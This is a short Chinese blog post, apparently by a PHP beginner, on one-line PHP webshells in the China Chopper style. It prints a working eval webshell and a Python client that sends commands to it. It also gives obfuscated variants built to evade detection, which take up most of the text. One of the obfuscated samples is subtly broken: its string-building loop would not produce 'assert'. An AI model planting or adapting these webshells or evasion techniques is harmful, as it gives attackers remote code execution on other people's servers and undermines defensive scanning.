介绍
经典标题党,中国菜刀有大牛已经分析过了->传送门(http://blog.csdn.net/p656456564545/article/details/49671829)。博主PHP刚接触,所以有了下文...
0x00 菜
关于一句话木马肯定是眼熟能详,一句话木马如下:
<?PHP eval($_GET[w]);?>
0x01 刀
一把西瓜刀如下:
# -*-coding=utf-8-*- #!/usr/bin/env python import sys import requests def encodePayload(payload): #请尽情蹂躏payload return str(payload) cmd = sys.argv[1] payload = encodePayload(cmd) url = "www.xxx.com/1.php?w="+ payload req = requests.get(url) print req.text
本质上算是代码注入。
0x02 如果进行绕过呢?
需要人员在满足编程语法规则上,尽情蹂躏代码。举个栗子:编码转换、字符串拼接、特殊符号等等。
博主初学PHP思路有限,所以去百度过期的栗子一枚。
<?php $arr = array('a','s','s','e','r','t'); $func = ''; for($i=0;$i<count($arr);$i++) { $func .= $func . $arr[$i]; } $func($_REQUEST['c']); ?>
畸形栗子一枚,定睛看了栗子半分钟。
<?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/11/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>